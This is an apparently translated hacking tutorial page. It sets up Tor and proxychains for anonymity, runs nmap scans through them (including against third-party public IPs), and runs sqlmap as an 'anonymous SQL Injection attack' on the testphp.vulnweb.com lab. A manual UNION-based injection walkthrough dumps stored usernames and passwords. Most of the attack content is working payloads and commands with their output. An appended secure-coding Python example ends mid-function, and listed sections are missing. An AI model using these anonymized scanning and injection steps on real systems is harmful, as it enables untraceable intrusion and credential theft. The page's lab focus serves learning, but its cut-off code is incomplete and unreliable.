SQL Injection - ( )


Manual SQL Injection

Kali tool - Sqlmap


*** Page best viewed in the " Chrome browser "


Index


01 - Leis

02 - Proxychains

03 - Firefox add-ons ( Tor )

04 - Tor Browser HackBar

05 - Online Labs

06 - SQL Injection - Manual injection  ( example 1 )

07 - Some more manual injection command examples

08 - Kali Linux - installing and setting up

09 - SQL Injection with sqlmap        ( example 2 )

10 - Some more sqlmap parameters

11 - Setting up dvwa lab

12 - Cracking passwords with hydra

13 - Cracking passwords with john the ripper

14 - uploaders

15 - dirb

16 - nikto

17 - uniscan

18 - compiling c

19 - perl

20 - python

21 - shell encoding

22 - Compressing - zip, rar, tar.gz, bz2, tar, bz2

23 - 10 minute email

24 - Encrypt x Decrypt Text



01 - About the laws

Nicknamed the Carolina Dieckmann Law, the Cybercrime Law (12.737/2012) defines as
crimes offences related to the electronic medium, such as breaking into computers,
violating users' data or "taking down" websites.

The bill that gave rise to the law (PLC 35/2012) was drafted at the time when intimate
photos of the actress Carolina Dieckmann were copied from her computer and spread over
the world wide web. The text was demanded by the financial sector, given the number of
scams carried out over the internet.


It came into force on 02/04/2013

Breaking into a computing device:

Can carry a prison sentence ranging from 3 months to one year, plus a fine.

Obtaining, through the break-in, the content of "private electronic communications,
commercial or industrial secrets, confidential information":

Penalty of 6 months to 2 years in prison, plus a fine. The same applies if the offence
involves the disclosure, sale or transmission to third parties, whether sold or handed
over for free, of the material obtained through the break-in.

The law also provides for penalties to be increased by one sixth to one third if the
break-in causes economic loss, and by one to two thirds "if there is disclosure, sale or
transmission to a third party, under any title, of the data or information obtained".

Penalties may also be increased by one third to one half if the crime is committed
against the President of the Republic, the presidents of the Supreme Federal Court, of
the Chamber of Deputies, of the Senate, of legislative assemblies and chambers, of
municipal councils, or the top officials "of the direct and indirect federal, state,
municipal or Federal District administration".

02 - Proxychains


Tor is free and open-source software for protecting personal anonymity while browsing
the Internet and in online activities, protecting against censorship and protecting
personal privacy. Most GNU/Linux distributions provide Tor packages, although there are
versions for other operating systems, such as Windows and Mac OS.

The Tor network is a network of http tunnels (with tls) overlaid on the Internet, where
the network's routers are ordinary users' computers running a program and with web
access (only). The project's main goal is to guarantee the anonymity of the user who is
accessing the web.

The Tor client is a program that must be installed on the computer and that works as a
socks 5 proxy for it. It provides a bind, usually on the machine's local port 9050.
Programs must then be configured to use a socks 5 proxy server and pointed at the
localhost address (127.0.0.1).



Follow the steps below to install and configure it:


Install Tor from the Tor Project repository, since it is always kept up to date.

Copy and paste the two lines below into the terminal:


echo 'deb https://deb.torproject.org/torproject.org stretch main
deb-src https://deb.torproject.org/torproject.org stretch main' > /etc/apt/sources.list.d/tor.list


Then, download the Tor Project package signing key and import it into your APT keyring.

 wget -O- 'https://pgp.mit.edu/pks/lookup?op=get&search=0xA3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89' | sudo apt-key add - 


The line above is the same as the one below; I only broke it up for better readability.

 wget -O- 'https://pgp.mit.edu/pks/lookup?op=
get&search=0xA3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89' | sudo apt-key add - 

-------

 apt-get update 

 apt-get install tor torsocks polipo privoxy proxychains 

-------

 tor &  

Mar 15 14:22:56.060 [notice] Tor 0.2.9.9 (git-1d8323c042800718) running on Linux with Libevent 2.0.21-stable, OpenSSL 1.1.0c and Zlib 1.2.8.
Mar 15 14:22:56.061 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
Mar 15 14:22:56.062 [notice] Read configuration file "/etc/tor/torrc".
Mar 15 14:22:56.069 [notice] Opening Socks listener on 127.0.0.1:9050
Mar 15 14:22:56.000 [notice] Parsing GEOIP IPv4 file /usr/share/tor/geoip.
Mar 15 14:22:56.000 [notice] Parsing GEOIP IPv6 file /usr/share/tor/geoip6.
Mar 15 14:22:56.000 [warn] You are running Tor as root. You don't need to, and you probably shouldn't.
Mar 15 14:22:56.000 [notice] Bootstrapped 0%: Starting
Mar 15 14:22:57.000 [notice] Bootstrapped 5%: Connecting to directory server
Mar 15 14:22:57.000 [notice] Bootstrapped 10%: Finishing handshake with directory server
Mar 15 14:22:57.000 [notice] Bootstrapped 15%: Establishing an encrypted directory connection
Mar 15 14:22:58.000 [notice] Bootstrapped 20%: Asking for networkstatus consensus
Mar 15 14:22:58.000 [notice] Bootstrapped 25%: Loading networkstatus consensus
Mar 15 14:22:59.000 [notice] I learned some more directory information, but not enough to build a circuit: We have no usable consensus.
Mar 15 14:23:00.000 [notice] Bootstrapped 40%: Loading authority key certs
Mar 15 14:23:00.000 [notice] Bootstrapped 45%: Asking for relay descriptors
Mar 15 14:23:00.000 [notice] I learned some more directory information, but not enough to build a circuit: We need more microdescriptors: we have 0/7344, and can only build 0% of likely paths. (We have 0% of guards bw, 0% of midpoint bw, and 0% of exit bw = 0% of path bw.)
Mar 15 14:23:01.000 [notice] Bootstrapped 50%: Loading relay descriptors
Mar 15 14:23:03.000 [notice] Bootstrapped 55%: Loading relay descriptors
Mar 15 14:23:03.000 [notice] Bootstrapped 61%: Loading relay descriptors
Mar 15 14:23:03.000 [notice] Bootstrapped 70%: Loading relay descriptors
Mar 15 14:23:03.000 [notice] Bootstrapped 75%: Loading relay descriptors
Mar 15 14:23:04.000 [notice] Bootstrapped 80%: Connecting to the Tor network
Mar 15 14:23:05.000 [notice] Bootstrapped 90%: Establishing a Tor circuit
Mar 15 14:23:06.000 [notice] Tor has successfully opened a circuit. Looks like client functionality is working.
Mar 15 14:23:06.000 [notice] Bootstrapped 100%: Done

-------

 tor --verify-config 
Dec 10 11:29:52.237 [notice] Tor 0.3.4.9 (git-de9ea9f0dfc5ecae) running on Linux with Libevent 2.1.8-stable, OpenSSL 1.1.1a, Zlib 1.2.11, Liblzma 5.2.2, and Libzstd 1.3.5.
Dec 10 11:29:52.237 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
Dec 10 11:29:52.238 [notice] Read configuration file "/etc/tor/torrc".
Dec 10 11:29:52.241 [warn] You are running Tor as root. You don't need to, and you probably shouldn't.
Configuration was valid

-------

 tor -f /path/to/your/own/torrc 
Dec 10 11:30:45.233 [notice] Tor 0.3.4.9 (git-de9ea9f0dfc5ecae) running on Linux with Libevent 2.1.8-stable, OpenSSL 1.1.1a, Zlib 1.2.11, Liblzma 5.2.2, and Libzstd 1.3.5.
Dec 10 11:30:45.233 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
Dec 10 11:30:45.233 [warn] Unable to open configuration file "/path/to/your/own/torrc".
Dec 10 11:30:45.234 [err] Reading config failed--see warnings above.

-------

 netstat -tanp | grep tor 
tcp        0      0 127.0.0.1:9050          0.0.0.0:*               LISTEN      9730/tor
tcp        0      0 192.168.2.199:52786     134.119.3.164:9001      ESTABLISHED 9730/tor
tcp        0      0 192.168.2.199:60570     163.172.185.132:443     ESTABLISHED 9730/tor
tcp        0      0 192.168.2.199:56166     82.196.12.245:443       ESTABLISHED 9730/tor
tcp        0      0 192.168.2.199:37466     139.59.210.164:443      ESTABLISHED 9730/tor
tcp        0      0 192.168.2.199:37472     198.96.155.3:5001       ESTABLISHED 9730/tor
tcp        0      0 192.168.2.199:48184     193.171.202.146:9001    ESTABLISHED 9730/tor

-------

 netstat -antlp | grep LISTEN 
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      830/sshd
tcp        0      0 127.0.0.1:9050          0.0.0.0:*               LISTEN      3166/tor
tcp        0      0 127.0.0.1:8123          0.0.0.0:*               LISTEN      2135/polipo
tcp6       0      0 :::22                   :::*                    LISTEN      830/sshd

-------

 netstat -tanp | grep tor 
tcp        0      0 127.0.0.1:9050          0.0.0.0:*               LISTEN      3166/tor
tcp        0      0 192.168.142.129:49378   193.70.43.76:9001       ESTABLISHED 3166/tor
tcp        0      0 192.168.142.129:36678   194.88.105.97:443       ESTABLISHED 3166/tor
tcp        0      0 192.168.142.129:44512   144.76.236.14:443       ESTABLISHED 3166/tor
tcp        0      0 192.168.142.129:49972   185.100.86.128:9001     ESTABLISHED 3166/tor
tcp        0      0 192.168.142.129:50070   176.10.104.240:443      ESTABLISHED 3166/tor

-------

 nano /etc/proxychains.conf 

dynamic_chain

strict_chain

random_chain

proxy_dns

tcp_read_time_out 15000
tcp_connect_time_out 8000

socks4  127.0.0.1 9050
socks5  127.0.0.1 9050

Only one of the three chain modes (dynamic_chain, strict_chain, random_chain) may be
active at a time; leave the other two commented out with #. Likewise keep a single
ProxyList entry for Tor (socks5 127.0.0.1 9050): with two entries proxychains tries to
chain the second proxy through the first.

ctrl + x, y, enter  ( save and exit the file )

-------

service tor restart 

-------

 service tor status 
● tor.service - Anonymizing overlay network for TCP (multi-instance-master)
   Loaded: loaded (/lib/systemd/system/tor.service; disabled; vendor preset: disabled)
   Active: active (exited) since Sat 2018-12-01 11:50:09 EST; 2min 4s ago
   Process: 2068 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
   Main PID: 2068 (code=exited, status=0/SUCCESS)

Dec 01 11:50:09 kali systemd[1]: Starting Anonymizing overlay network for TCP (multi-instance-master)...
Dec 01 11:50:09 kali systemd[1]: Started Anonymizing overlay network for TCP (multi-instance-master).

-------

Stopping the processes.

 service privoxy stop && service tor stop 

-------

To remain anonymous, start the processes below.
service privoxy start && service tor start
-------

Updating the system.

 apt-get update 

-------

Showing the status of tor.

 service tor status 
tor.service - LSB: Starts The Onion Router daemon processes
   Loaded: loaded (/etc/init.d/tor)
   Active: active (running) since Mon 2016-06-13 09:21:08 EDT; 37min ago
  Process: 1859 ExecStop=/etc/init.d/tor stop (code=exited, status=0/SUCCESS)
  Process: 1870 ExecStart=/etc/init.d/tor start (code=exited, status=0/SUCCESS)
   CGroup: /system.slice/tor.service
           1881 /usr/bin/tor --defaults-torrc /usr/share/tor/tor-service-defaults-torrc --hush

Jun 13 09:21:08 kali tor[1870]: Starting tor daemon...done.

-------

Checking.

 netstat -ant | grep 8118 
tcp        0      0 127.0.0.1:8118          0.0.0.0:*               LISTEN
tcp6       0      0 ::1:8118                :::*                    LISTEN

-------

 netstat -na | grep 9050 
tcp        0      0 127.0.0.1:9050          0.0.0.0:*               LISTEN

-------

 netstat -tanp | grep tor 
tcp        0      0 127.0.0.1:9050          0.0.0.0:*               LISTEN      1881/tor
tcp        0      0 192.168.1.102:38764     91.109.29.120:443       ESTABLISHED 1881/tor

-------

 tail -f /var/log/tor/log 
Jun 13 16:50:10.000 [notice] Parsing GEOIP IPv4 file /usr/share/tor/geoip.
Jun 13 16:50:10.000 [notice] Parsing GEOIP IPv6 file /usr/share/tor/geoip6.
Jun 13 16:50:10.000 [notice] Bootstrapped 0%: Starting
Jun 13 16:50:10.000 [notice] Bootstrapped 5%: Connecting to directory server
Jun 13 16:50:10.000 [notice] We now have enough directory information to build circuits.
Jun 13 16:50:10.000 [notice] Bootstrapped 80%: Connecting to the Tor network
Jun 13 16:50:11.000 [notice] Bootstrapped 85%: Finishing handshake with first hop
Jun 13 16:50:11.000 [notice] Bootstrapped 90%: Establishing a Tor circuit
Jun 13 16:50:13.000 [notice] Tor has successfully opened a circuit. Looks like client functionality is working.
Jun 13 16:50:13.000 [notice] Bootstrapped 100%: Done

-------

 tor 
Jun 13 16:45:51.026 [notice] Tor v0.2.5.12 (git-3731dd5c3071dcba) running on Linux with Libevent 2.0.21-stable, OpenSSL 1.0.1k and Zlib 1.2.8.
Jun 13 16:45:51.026 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
Jun 13 16:45:51.027 [notice] Read configuration file "/etc/tor/torrc".
Jun 13 16:45:51.029 [notice] Opening Socks listener on 127.0.0.1:9050
Jun 13 16:45:51.029 [warn] Could not bind to 127.0.0.1:9050: Address already in use. Is Tor already running?
Jun 13 16:45:51.029 [notice] Opening DNS listener on 127.0.0.1:53
Jun 13 16:45:51.029 [notice] Closing partially-constructed DNS listener on 127.0.0.1:53
Jun 13 16:45:51.029 [warn] Failed to parse/validate config: Failed to bind one of the listener ports.
Jun 13 16:45:51.030 [err] Reading config failed--see warnings above.
-------

 tor --verify-config 
Jun 13 17:02:51.335 [notice] Tor v0.2.5.12 (git-3731dd5c3071dcba) running on Linux with Libevent 2.0.21-stable, OpenSSL 1.0.1k and Zlib 1.2.8.
Jun 13 17:02:51.336 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
Jun 13 17:02:51.336 [notice] Read configuration file "/etc/tor/torrc".
Jun 13 17:02:51.339 [warn] You are running Tor as root. You don't need to, and you probably shouldn't.
Configuration was valid

-------

 tor -f /path/to/your/own/torrc 
Jun 13 17:04:41.936 [notice] Tor v0.2.5.12 (git-3731dd5c3071dcba) running on Linux with Libevent 2.0.21-stable, OpenSSL 1.0.1k and Zlib 1.2.8.
Jun 13 17:04:41.936 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
Jun 13 17:04:41.936 [warn] Unable to open configuration file "/path/to/your/own/torrc".
Jun 13 17:04:41.936 [err] Reading config failed--see warnings above.
-------

Let's check what our server's IP is.

 export http_proxy="http://localhost:8118" 

-------

 curl ipecho.net/plain ; echo 
198.50.200.135

-------

Let's see where this IP is from.

 whois 198.50.200.135 

#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
#
# If you see inaccuracies in the results, please report at
# https://www.arin.net/public/whoisinaccuracy/index.xhtml
#

NetRange:       198.50.128.0 - 198.50.255.255
CIDR:           198.50.128.0/17
NetName:        OVH-ARIN-6
NetHandle:      NET-198-50-128-0-1
Parent:         NET198 (NET-198-0-0-0-0)
NetType:        Direct Allocation
OriginAS:       AS16276
Organization:   OVH Hosting, Inc. (HO-2)
RegDate:        2013-03-07
Updated:        2013-03-07
Ref:            https://whois.arin.net/rest/net/NET-198-50-128-0-1

OrgName:        OVH Hosting, Inc.
OrgId:          HO-2
Address:        800-1801 McGill College
City:           Montreal
StateProv:      QC
PostalCode:     H3A 2N4
Country:        CA
RegDate:        2011-06-22
Updated:        2016-03-25
Ref:            https://whois.arin.net/rest/org/HO-2

-------

Using proxychains with nmap.

Keep in mind that proxychains only wraps TCP connect() sockets: a raw-packet SYN scan
(-sS) and nmap's host-discovery probes do not go through the chain and leak directly
from your machine, which is why the later commands use -sT together with -PN / -Pn.

 proxychains nmap -sS ip_x 

-------

 proxychains nmap -sT -PN -n -sV -p 80,443,21,22 ip_x 

-------

 proxychains nmap -Pn -sT -n -sV -p 21,22,23,53,80,110,139,143,443 ip_x 

-------

 nmap -Pn -sT -p 80,443,21,22,23 80.14.163.161 

Starting Nmap 7.00 ( https://nmap.org ) at 2016-06-13 15:41 EDT
Nmap scan report for LStLambert-656-1-112-161.w80-14.abo.wanadoo.fr (80.14.163.161)
Host is up.
PORT    STATE    SERVICE
21/tcp  filtered ftp
22/tcp  filtered ssh
23/tcp  filtered telnet
80/tcp  filtered http
443/tcp filtered https

Nmap done: 1 IP address (1 host up) scanned in 3.45 seconds

-------

 proxychains nmap -sV -Pn -p80,22,135 8.8.8.8 

ProxyChains-3.1 (http://proxychains.sf.net)

Starting Nmap 7.00 ( https://nmap.org ) at 2016-06-13 14:14 EDT
Nmap scan report for google-public-dns-a.google.com (8.8.8.8)
Host is up (0.038s latency).
PORT    STATE    SERVICE VERSION
22/tcp  filtered ssh
80/tcp  filtered http
135/tcp filtered msrpc

-------

 netstat -plant 

Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      1215/sshd
tcp        0      0 127.0.0.1:9050          0.0.0.0:*               LISTEN      1881/tor
tcp        0      0 192.168.1.102:38814     91.109.29.120:443       ESTABLISHED 1881/tor
tcp        0    252 192.168.1.102:22        192.168.1.100:50185     ESTABLISHED 1536/1
tcp6       0      0 ::1:8118                :::*                    LISTEN      1854/privoxy
tcp6       0      0 :::22                   :::*                    LISTEN      1215/sshd

-------

The IP above is the Kali box = 192.168.1.102

Checking the IP..

 whois 91.109.29.120 | grep address 

address: Kleyer Strasse 79 / Tor 13
address: 60326
address: Frankfurt
address: GERMANY
address: Kleyerstrasse 79 / Tor 13
address: 60326 Frankfurt am Main
address: Germany
-------

Let's use proxychains with sqlmap to carry out an anonymous SQL Injection attack.

 proxychains sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --flush-session --time-sec=5 --tor-type=socks5 --tor-port=9050 

ProxyChains-3.1 (http://proxychains.sf.net)
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201603300a89}
|_ -| . | | | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 14:26:21

|DNS-request| testphp.vulnweb.com
|S-chain|-<>-127.0.0.1:9050-<><>-4.2.2.2:53-<><>-OK
|DNS-response| testphp.vulnweb.com is 176.28.50.165
[14:26:22] [INFO] testing connection to the target URL
|DNS-request| testphp.vulnweb.com
|S-chain|-<>-127.0.0.1:9050-<><>-4.2.2.2:53-<><>-OK
|DNS-response| testphp.vulnweb.com is 176.28.50.165
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
[14:26:25] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[14:26:26] [INFO] testing if the target URL is stable
[14:26:26] [INFO] target URL is stable
[14:26:26] [INFO] testing if GET parameter 'artist' is dynamic
[14:26:27] [INFO] confirming that GET parameter 'artist' is dynamic
[14:26:28] [INFO] GET parameter 'artist' is dynamic
[14:26:29] [INFO] heuristic (basic) test shows that GET parameter 'artist' might be injectable (possible DBMS: 'MySQL')
[14:26:30] [INFO] testing for SQL injection on GET parameter 'artist'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[14:26:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
[14:26:46] [INFO] GET parameter 'artist' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[14:26:46] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[14:26:49] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[14:26:50] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[14:26:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[14:26:52] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[14:26:52] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[14:26:53] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[14:26:54] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)'
[14:26:54] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[14:26:55] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)'
[14:26:56] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[14:26:56] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
[14:26:57] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
[14:26:58] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[14:26:59] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[14:26:59] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[14:27:00] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[14:27:01] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[14:27:02] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[14:27:02] [INFO] testing 'MySQL inline queries'
[14:27:03] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[14:27:04] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[14:27:05] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[14:27:06] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[14:27:06] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[14:27:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[14:27:08] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
[14:27:20] [INFO] GET parameter 'artist' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable
[14:27:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[14:27:20] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
[14:27:21] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
[14:27:23] [INFO] target URL appears to have 3 columns in query
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-176.28.50.165:80-<><>-OK
[14:27:29] [INFO] GET parameter 'artist' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'artist' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 48 HTTP(s) requests:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 9518=9518

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: artist=1 AND (SELECT * FROM (SELECT(SLEEP(5)))NsJj)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-7658 UNION ALL SELECT NULL,NULL,CONCAT(0x7162706a71,0x54754c5165526665574370556d6777466a7541764c6d7643505265597a507274585973536a476359,0x7178627671)-- -
---
[14:32:37] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[14:32:37] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at 14:32:37

03 - FireFox add-ons

Tools you should have in your computer.

The Five Greatest Firefox Tools for Hacking!


Here is a list of the greatest Firefox add-ons for Hacking:

1. Hackbar           – Execute Commands like SQL Injection, XSS and more…

2. Live HTTP Headers – Capture all (HEADERS) of a Page (Used when uploading a shell….)

3. SQL Inject Me     – SQL Injection Commands and Automations.

4. Firebug           – Edit a Website’s source code.

5. Tamper Data       – Watch the data that your computer sends to a website and the data
                        the website sends to you.

6. Tor Browser       - Download and install Tor.

04 - Tor Browser + HackBar


Why use Tor Browser?

The Tor software protects you by bouncing your communications around a distributed
network of relays run by volunteers all around the world: it prevents somebody watching
your Internet connection from learning what sites you visit, it prevents the sites you
visit from learning your physical location, and it lets you access sites which are
blocked.

Download Tor Browser: https://www.torproject.org/download/download.html.en

The Tor Browser version used here is 4.5.3 ( older ); this way we are able to use HackBar.
Newer versions do not allow HackBar.


HackBar is a Firefox extension for penetration testers. HackBar extends the address bar
of Firefox and thus provides enough space for long injection URLs during penetration
testing. HackBar also has some additional features, including the ability to perform
encryption, encoding, decryption, POST data manipulation, injection code generation, etc.

This toolbar will help you in testing SQL injections, XSS holes and site security. It is
NOT a tool for executing standard exploits and it will NOT teach you how to hack a site.
Its main purpose is to help a developer do security audits on his code. If you know what
you're doing, this toolbar will help you do it faster. If you want to learn to find
security holes, you can also use this toolbar, but you will probably also need a book,
and a lot of Google.

Example using HackBar; notice it has many options ( tools ) ...

Add-on "anonymox" to browse websites anonymously.

05 - Online Lab


Online labs.

06 - Manual Injection - example 1


To test for possible SQL Injection vulnerabilities we have some tools that check whether
the database is vulnerable or not.


For this tutorial we will use the online lab below, created for exactly this purpose:

http://testphp.vulnweb.com


Let's start by clicking on artists below




Click on the first record, where the red arrow points.

http://testphp.vulnweb.com/artists.php




See in the image below that the record was selected.

http://testphp.vulnweb.com/artists.php?artist=1




Now let's add a single quote right after the id 1 to detect whether our target has a
SQL Injection flaw ( 1' )

http://testphp.vulnweb.com/artists.php?artist=1'

The error below indicates that this URL is vulnerable.




Now let's use order by to discover the number of columns in the query.

Keep adding the numbers sequentially, 1,2,3,4,5... until the error appears.

When the error appears, it means that the previous number is the total number of
columns in the query behind the current page.

In the URL bar type the line below:

http://testphp.vulnweb.com/artists.php?artist=1 order by 1,2,3,4





Discovering the system version.

In the URL bar type the line below:

http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2,version()






Discovering the user.

http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2,user()




Now let's identify where the tables are.

It is important to set an ID that does not exist, so that the page displays the columns
with their corresponding numbers; in this case we are guessing, assuming that 100 does
not exist ...


http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2,3




See below, column 3 is vulnerable.




The URL below is a single line:

http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2,
group_concat(table_name) from information_schema.tables





Above, the tables were listed horizontally; below we will see how to list them
vertically.


To list the tables in a single column we have to convert <br> to hexadecimal, and in
front of the hex value we need to add 0x

<br> = 0x3c62723e

To convert <br> to hexadecimal use the link below:

http://online-toolz.com/tools/text-hex-convertor.php

In front of the hex value add 0x = 0x3c62723e

Let's list the tables vertically. Type the line below as a single line:

http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2,
group_concat(table_name,0x3c62723e) from information_schema.tables

Let's list only the tables of the current database. Type the line below as a single line:

http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2,
group_concat(table_name,0x3c62723e) from information_schema.tables where table_schema=database()

Let's list all the fields (columns) of the users table. Type the line below as a single line:

http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2,
group_concat(column_name) from information_schema.columns where table_name='users'

In the link below we convert the colon ( : ) to 0x3a

http://www.rapidtables.com/convert/number/hex-to-ascii.htm

With the columns identified, we will display the data found in the uname and pass
columns of the users table. Type the line below as a single line:

http://testphp.vulnweb.com/artists.php?artist=100 union all select 1,2,
concat(uname,0x3a,pass) from users

Login : test
Password: test
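Both the flaw this walkthrough exercises and its fix fit in a few lines of application code. The following is an added example, written for this edit and not code from the page or from the vulnweb lab: a constructed in-memory SQLite database with an artists table and a users table (uname, pass), a handler that concatenates the artist parameter into the SQL text the way artists.php behaves, a handler that only binds the value, and a handler that validates and binds it. The table and column names follow the page; the row values are made up, and SQLite's || stands in for MySQL's concat(uname,0x3a,pass).

```python
import sqlite3

# Constructed in-memory schema modelled on the lab tables the walkthrough names
# (artists, and users with uname/pass). The row values are made up for this example.
SCHEMA = """
CREATE TABLE artists (artist_id INTEGER PRIMARY KEY, aname TEXT, adesc TEXT);
CREATE TABLE users (uname TEXT, pass TEXT);
INSERT INTO artists VALUES (1, 'r4w8173', 'lorem ipsum');
INSERT INTO artists VALUES (2, 'Blad3', 'dolor sit amet');
INSERT INTO users VALUES ('test', 'test');
"""


def open_lab_db():
    """Return a fresh in-memory database loaded with the constructed schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def artist_vulnerable(conn, artist_param):
    """The pattern behind artists.php?artist=...: the raw query-string value is
    pasted into the SQL text, so it can end the expression and append a UNION."""
    sql = "SELECT artist_id, aname, adesc FROM artists WHERE artist_id=" + artist_param
    return conn.execute(sql).fetchall()


def artist_bound_as_text(conn, artist_param):
    """Binding alone, with no type check: the driver sends the whole string as a
    value, so a payload is compared against artist_id and matches nothing."""
    sql = "SELECT artist_id, aname, adesc FROM artists WHERE artist_id=?"
    return conn.execute(sql, (artist_param,)).fetchall()


def artist_parameterized(conn, artist_param):
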